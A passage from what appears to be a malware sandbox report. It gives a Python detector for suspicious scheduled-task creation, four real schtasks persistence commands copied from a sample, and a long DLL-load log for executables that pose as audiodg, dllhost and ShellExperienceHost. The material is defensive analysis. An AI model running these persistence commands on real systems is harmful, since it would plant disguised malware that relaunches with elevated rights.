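        homes = SYSTEM_BINARY_HOMES[name]
        if not any(parent == h or parent.startswith(h + "\\") for h in homes):
            reasons.append(f"{p.name} outside {' / '.join(homes) or 'any legitimate location'}")
    if low.startswith(SUSPICIOUS_ROOTS):
        reasons.append("executable under a user-writable or unusual root")
    if SUSPICIOUS_DIRS & {part.lower() for part in p.parts[1:-1]}:
        reasons.append("executable placed in a logs/temp directory")
    return reasons


def assess_schtasks(cmdline: str) -> Optional[dict]:
    """Combine the path check with the task's own trigger, run level and naming."""
    opts = parse_schtasks_create(cmdline)
    if opts is None:
        return None
    target = opts["tr"]
    reasons = assess_path(target)
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        reasons.append("requests /rl HIGHEST")
    mo = str(opts.get("mo", "1"))
    if str(opts.get("sc", "")).upper() == "MINUTE" and mo.isdigit() and int(mo) <= 15:
        reasons.append(f"re-executes every {mo} minute(s)")
    stem, tn = PureWindowsPath(target).stem.lower(), str(opts.get("tn", "")).lower()
    if tn and (tn == stem or (len(tn) == len(stem) + 1 and tn.startswith(stem))):
        reasons.append("task name mirrors the target file name")
    return {"task": opts.get("tn"), "target": target, "reasons": reasons}


# Four command lines copied from the report above; the last one is constructed as a benign control
SAMPLE_COMMAND_LINES = [
    r"""schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f""",
    r"""schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f""",
    r"""schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "AcmeBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Acme\backup.exe" /f""",
]


def flagged(cmdlines: list[str]) -> list[dict]:
    """Only the /create commands that earned at least one reason."""
    return [r for r in map(assess_schtasks, cmdlines) if r and r["reasons"]]


if __name__ == "__main__":
    for r in flagged(SAMPLE_COMMAND_LINES):
        print(f"{r['task']!r} -> {r['target']}: " + "; ".join(r["reasons"]))
```

assess_path() is also the check to run on the plain image paths in the process-creation lines above (the two audiodg.exe and dllhost.exe launches whose parent is recorded as unknown, consistent with the WMI Win32_Process::Create calls listed earlier): every one of them fails on the borrowed-name or suspicious-directory test alone, without needing the schtasks context.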
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: apphelp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: amsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: userenv.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wbemcomn.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: winnsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: propsys.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasapi32.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasman.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rtutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: edputil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: urlmon.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: iertutil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: srvcli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: netutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mswsock.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: policymanager.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: msvcp110_win.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: winhttp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wintypes.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: appresolver.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: bcp47langs.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: slc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sppc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasadhlp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: apphelp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: apphelp.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\System.exe Section loaded: uxtheme.dll
Source: C:\Recovery\System.exe Section loaded: windows.storage.dll
Source: C:\Recovery\System.exe Section loaded: wldp.dll
Source: C:\Recovery\System.exe Section loaded: profapi.dll
Source: C:\Recovery\System.exe Section loaded: cryptsp.dll
Source: C:\Recovery\System.exe Section loaded: rsaenh.dll
Source: C:\Recovery\System.exe Section loaded: cryptbase.dll
Source: C:\Recovery\System.exe Section loaded: sspicli.dll
Source: C:\Recovery\System.exe Section loaded: mscoree.dll
Source: C:\Recovery\System.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\System.exe Section loaded: version.dll
Source: C:\Recovery\System.exe Section loaded: vcruntime140_clr0400.dll
